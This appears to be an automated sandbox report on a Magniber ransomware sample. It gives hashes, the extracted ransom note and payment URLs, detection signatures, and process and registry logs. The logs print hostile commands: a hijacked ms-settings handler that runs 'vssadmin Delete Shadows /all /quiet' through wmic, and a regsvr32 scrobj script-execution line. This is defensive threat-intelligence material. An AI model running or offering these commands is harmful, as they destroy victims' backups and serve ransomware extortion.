magniber | f3fff0e99b7e8c7a2d8988759f360dfd24b3e7108e4cba7691f40dacd7c310a3

Analysis

max time kernel
146s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29-01-2024 09:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7f786f98ee0c469c2a7eb81cce8f44c6.dll
Size

38KB
MD5

7f786f98ee0c469c2a7eb81cce8f44c6
SHA1

e09daefa41183764a61e4a43704889cbb9172346
SHA256

f3fff0e99b7e8c7a2d8988759f360dfd24b3e7108e4cba7691f40dacd7c310a3
SHA512

039ed6272d95b73a4d6282326b1a26802ae271d005cc871911455f685ae7bfb7bb04ed0f7e30e4721331a6d5783248d12f91ab414df10608411a08bb2cabc431
SSDEEP

768:jVuj0qdq03H5RlWWLHM25c3IitrNo+3ZGMezaXNb5I6:jKZ3BHM2+wwGMezaHd

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://50389490e2ac8a302ahxgpjnwi.hy5tprdl77synlgxroueyzpat4iszkkx52r4i3ufbg6l7b32zqkyc5ad.onion/hxgpjnwi Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://50389490e2ac8a302ahxgpjnwi.metthe.top/hxgpjnwi http://50389490e2ac8a302ahxgpjnwi.sameleg.site/hxgpjnwi http://50389490e2ac8a302ahxgpjnwi.iflook.club/hxgpjnwi http://50389490e2ac8a302ahxgpjnwi.keystwo.uno/hxgpjnwi Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://50389490e2ac8a302ahxgpjnwi.hy5tprdl77synlgxroueyzpat4iszkkx52r4i3ufbg6l7b32zqkyc5ad.onion/hxgpjnwi

http://50389490e2ac8a302ahxgpjnwi.metthe.top/hxgpjnwi

http://50389490e2ac8a302ahxgpjnwi.sameleg.site/hxgpjnwi

http://50389490e2ac8a302ahxgpjnwi.iflook.club/hxgpjnwi

http://50389490e2ac8a302ahxgpjnwi.keystwo.uno/hxgpjnwi

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral2/memory/3148-8-0x000001F2BF2C0000-0x000001F2BFAA2000-memory.dmp	family_magniber
behavioral2/memory/2472-112-0x00000215A3830000-0x00000215A3834000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 36 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4868	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	488	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	904	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1100	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4024	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2900	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3840	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4284	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2544	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1744	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4848	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5344	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5472	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5524	2412	cmd.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5132	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4652	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1904	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5016	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4332	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3724	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5992	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4956	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4548	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5788	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5392	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5812	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6100	2412	vssadmin.exe	132
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6116	2412	vssadmin.exe	132

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (69) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 3148 set thread context of 2472	3148	rundll32.exe	29
PID 3148 set thread context of 2524	3148	rundll32.exe	31
PID 3148 set thread context of 2672	3148	rundll32.exe	33
PID 3148 set thread context of 3580	3148	rundll32.exe	70
PID 3148 set thread context of 3712	3148	rundll32.exe	45
PID 3148 set thread context of 3908	3148	rundll32.exe	69
PID 3148 set thread context of 4008	3148	rundll32.exe	68
PID 3148 set thread context of 3076	3148	rundll32.exe	46
PID 3148 set thread context of 788	3148	rundll32.exe	67
PID 3148 set thread context of 3084	3148	rundll32.exe	66
PID 3148 set thread context of 2120	3148	rundll32.exe	65
PID 3148 set thread context of 2608	3148	rundll32.exe	52

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 18 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
5132	vssadmin.exe
4484	vssadmin.exe
4956	vssadmin.exe
4548	vssadmin.exe
1808	vssadmin.exe
1692	vssadmin.exe
5788	vssadmin.exe
5392	vssadmin.exe
6100	vssadmin.exe
3724	vssadmin.exe
5812	vssadmin.exe
4652	vssadmin.exe
208	vssadmin.exe
4332	vssadmin.exe
5992	vssadmin.exe
6116	vssadmin.exe
1904	vssadmin.exe
5016	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Software\Microsoft\Internet Explorer\IESettingSync	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies registry class 47 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings	TextInputHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings	StartMenuExperienceHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2560	notepad.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3148	rundll32.exe
3148	rundll32.exe
4980	msedge.exe
4980	msedge.exe
2976	msedge.exe
2976	msedge.exe
1376	identity_helper.exe
1376	identity_helper.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe
5996	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3580	Explorer.EXE
2672	taskhostw.exe

Suspicious behavior: MapViewOfSection 12 IoCs

pid	Process
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe
3148	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	4008	StartMenuExperienceHost.exe
Token: SeRestorePrivilege	4008	StartMenuExperienceHost.exe
Token: SeTakeOwnershipPrivilege	4008	StartMenuExperienceHost.exe
Token: SeRestorePrivilege	4008	StartMenuExperienceHost.exe
Token: SeTakeOwnershipPrivilege	2608	TextInputHost.exe
Token: SeRestorePrivilege	2608	TextInputHost.exe
Token: SeTakeOwnershipPrivilege	2608	TextInputHost.exe
Token: SeRestorePrivilege	2608	TextInputHost.exe
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeShutdownPrivilege	3580	Explorer.EXE
Token: SeCreatePagefilePrivilege	3580	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	992	msedge.exe
Token: SeSecurityPrivilege	992	msedge.exe
Token: SeTakeOwnershipPrivilege	992	msedge.exe
Token: SeLoadDriverPrivilege	992	msedge.exe
Token: SeSystemProfilePrivilege	992	msedge.exe
Token: SeSystemtimePrivilege	992	msedge.exe
Token: SeProfSingleProcessPrivilege	992	msedge.exe
Token: SeIncBasePriorityPrivilege	992	msedge.exe
Token: SeCreatePagefilePrivilege	992	msedge.exe
Token: SeBackupPrivilege	992	msedge.exe
Token: SeRestorePrivilege	992	msedge.exe
Token: SeShutdownPrivilege	992	msedge.exe
Token: SeDebugPrivilege	992	msedge.exe
Token: SeSystemEnvironmentPrivilege	992	msedge.exe
Token: SeRemoteShutdownPrivilege	992	msedge.exe
Token: SeUndockPrivilege	992	msedge.exe
Token: SeManageVolumePrivilege	992	msedge.exe
Token: 33	992	msedge.exe
Token: 34	992	msedge.exe
Token: 35	992	msedge.exe
Token: 36	992	msedge.exe
Token: SeIncreaseQuotaPrivilege	1692	vssadmin.exe
Token: SeSecurityPrivilege	1692	vssadmin.exe
Token: SeTakeOwnershipPrivilege	1692	vssadmin.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe
2976	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4008 wrote to memory of 5028	4008	StartMenuExperienceHost.exe	86
PID 4008 wrote to memory of 5028	4008	StartMenuExperienceHost.exe	86
PID 4008 wrote to memory of 5028	4008	StartMenuExperienceHost.exe	86
PID 4008 wrote to memory of 3576	4008	StartMenuExperienceHost.exe	85
PID 4008 wrote to memory of 3576	4008	StartMenuExperienceHost.exe	85
PID 4008 wrote to memory of 3576	4008	StartMenuExperienceHost.exe	85
PID 2608 wrote to memory of 2580	2608	TextInputHost.exe	90
PID 2608 wrote to memory of 2580	2608	TextInputHost.exe	90
PID 2608 wrote to memory of 2580	2608	TextInputHost.exe	90
PID 2608 wrote to memory of 1340	2608	TextInputHost.exe	92
PID 2608 wrote to memory of 1340	2608	TextInputHost.exe	92
PID 2608 wrote to memory of 1340	2608	TextInputHost.exe	92
PID 2472 wrote to memory of 2560	2472	sihost.exe	96
PID 2472 wrote to memory of 2560	2472	sihost.exe	96
PID 2472 wrote to memory of 700	2472	sihost.exe	97
PID 2472 wrote to memory of 700	2472	sihost.exe	97
PID 2472 wrote to memory of 1064	2472	sihost.exe	101
PID 2472 wrote to memory of 1064	2472	sihost.exe	101
PID 2472 wrote to memory of 852	2472	sihost.exe	98
PID 2472 wrote to memory of 852	2472	sihost.exe	98
PID 2524 wrote to memory of 2064	2524	svchost.exe	103
PID 2524 wrote to memory of 2064	2524	svchost.exe	103
PID 2524 wrote to memory of 4600	2524	svchost.exe	105
PID 2524 wrote to memory of 4600	2524	svchost.exe	105
PID 2672 wrote to memory of 3780	2672	taskhostw.exe	107
PID 2672 wrote to memory of 3780	2672	taskhostw.exe	107
PID 2672 wrote to memory of 4436	2672	taskhostw.exe	108
PID 2672 wrote to memory of 4436	2672	taskhostw.exe	108
PID 852 wrote to memory of 992	852	cmd.exe	298
PID 852 wrote to memory of 992	852	cmd.exe	298
PID 1064 wrote to memory of 1692	1064	cmd.exe	284
PID 1064 wrote to memory of 1692	1064	cmd.exe	284
PID 2064 wrote to memory of 4320	2064	cmd.exe	175
PID 2064 wrote to memory of 4320	2064	cmd.exe	175
PID 4600 wrote to memory of 4328	4600	cmd.exe	113
PID 4600 wrote to memory of 4328	4600	cmd.exe	113
PID 3580 wrote to memory of 3052	3580	Explorer.EXE	115
PID 3580 wrote to memory of 3052	3580	Explorer.EXE	115
PID 3580 wrote to memory of 4088	3580	Explorer.EXE	116
PID 3580 wrote to memory of 4088	3580	Explorer.EXE	116
PID 3712 wrote to memory of 1272	3712	svchost.exe	119
PID 3712 wrote to memory of 1272	3712	svchost.exe	119
PID 3712 wrote to memory of 4104	3712	svchost.exe	120
PID 3712 wrote to memory of 4104	3712	svchost.exe	120
PID 3780 wrote to memory of 3916	3780	cmd.exe	260
PID 3780 wrote to memory of 3916	3780	cmd.exe	260
PID 3052 wrote to memory of 2532	3052	cmd.exe	124
PID 3052 wrote to memory of 2532	3052	cmd.exe	124
PID 3076 wrote to memory of 4956	3076	RuntimeBroker.exe	269
PID 3076 wrote to memory of 4956	3076	RuntimeBroker.exe	269
PID 3076 wrote to memory of 1336	3076	RuntimeBroker.exe	261
PID 3076 wrote to memory of 1336	3076	RuntimeBroker.exe	261
PID 4436 wrote to memory of 1928	4436	cmd.exe	127
PID 4436 wrote to memory of 1928	4436	cmd.exe	127
PID 4088 wrote to memory of 4408	4088	cmd.exe	131
PID 4088 wrote to memory of 4408	4088	cmd.exe	131
PID 3084 wrote to memory of 2668	3084	RuntimeBroker.exe	133
PID 3084 wrote to memory of 2668	3084	RuntimeBroker.exe	133
PID 3084 wrote to memory of 4792	3084	RuntimeBroker.exe	134
PID 3084 wrote to memory of 4792	3084	RuntimeBroker.exe	134
PID 2120 wrote to memory of 2068	2120	RuntimeBroker.exe	144
PID 2120 wrote to memory of 2068	2120	RuntimeBroker.exe	144
PID 2120 wrote to memory of 2024	2120	RuntimeBroker.exe	143
PID 2120 wrote to memory of 2024	2120	RuntimeBroker.exe	143

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2560
- C:\Windows\system32\cmd.exe
  cmd /c "start http://50389490e2ac8a302ahxgpjnwi.metthe.top/hxgpjnwi^&2^&48910280^&69^&319^&2219041"
  2⤵
  PID:700
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://50389490e2ac8a302ahxgpjnwi.metthe.top/hxgpjnwi&2&48910280&69&319&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2976
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
